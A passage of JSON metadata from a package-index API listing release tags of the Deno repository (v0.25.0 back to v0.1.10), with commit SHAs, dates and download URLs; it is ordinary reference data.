/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub